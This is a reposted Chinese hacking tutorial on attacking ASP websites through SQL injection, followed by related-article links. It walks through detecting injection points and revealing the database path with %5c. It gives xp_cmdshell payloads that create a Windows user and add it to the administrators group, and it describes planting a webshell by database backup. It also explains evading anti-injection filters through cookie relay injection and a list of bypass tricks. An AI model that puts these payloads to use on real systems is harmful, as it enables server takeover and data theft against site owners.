脚本入侵讲解-asp注入漏洞

转载 2011年01月21日 13:38:00
1:注入漏洞
------------
1.asp手工注入
第一步:
先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
http://www.hack92.com/hack92.asp?id=1
我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏洞了!
2:注入点爆库方法
先举个例子一个注入http://www.hack92.com/asp/hack92.asp?id=1
然后改成爆库http://www.hack92.com/asp%5chack92.asp?id=1
利用%5c爆数据库
3:注入点sa权拿服务器
注入点http://www.hack92.com/hack92.asp?id=1
是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
--用xp_cmdshell执行命令
;exec master..xp_cmdshell"net user name password /add"--
;exec master..xp_cmdshell"net localgroup name administrators /add"--
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
这几个工具用命令建立账号密码
4:注入点db_owner权限备份webhsell 大家可以去百度搜索db_owner权限备份文章等等 或教程
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
列目录,找网站路径 然后数据库备份上我们的asp小马.大马或一句话。然后得到webshell
5:中转注入和突破防注入程序
我们是否可以用什么方法绕过SQL注入的限制呢
我就说下长用的cookie注入
http://www.hack92.com/hack92.asp?id=1 一个防注入的地址
我们来搭建个www先 然后打开 注入中转生成器
然后选择cookie
注入键名:写参数:id=
注入url地址写上:http://www.hack92.com/hack92.asp
来源页:写上:http://www.hack92.com/hack92.asp
post提交值写上:jmdcw=1
然后点击生成asp 目录就出现了一个jmCook.asp
把文件放在我们的搭建个www里
比如:http://127.0.0.1/jmCook.asp?jmdcw=1 然后注入

方法:
中转注入 有post cookie gel注入
1、运用编码技术绕过
2、通过空格绕过
3、运用字符串判断代替
4、通过类型转换修饰符N绕过
5、通过+号拆解字符串绕过
7、通过IN绕过
8、运用注释语句绕过
9:抓取cookies然后中转
等等!大家可以去百度搜索 工具和教程 文章
突破防注入程序
通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库
分析程序源码
然后突破

相关文章推荐

怎样避免上线网站遭受DDOS攻击,XSS攻击,SQL漏洞,脚本注入?

过滤URL中的一些特殊字符,动态SQL语句使用PrepareStatement..  ------解决方案----------------------------------------------...

千博企业网站管理系统HitCount.Asp页面注入漏洞

程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code If EnableStopInjection = True Then Dim Fy_Post, ...

ASP网站如何防止注入漏洞攻击

SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。但是...

SQL通用防注入系统asp版 插一句话漏洞利用

今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp 既然做了记录,再查看了下它的记录文件 于是想着构造个asp一句话写进去,前面...

SQL注入天书—ASP注入漏洞全接触

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进...

ASP漏洞集讲解及解决办法

  • 2010-09-06 17:56
  • 375KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)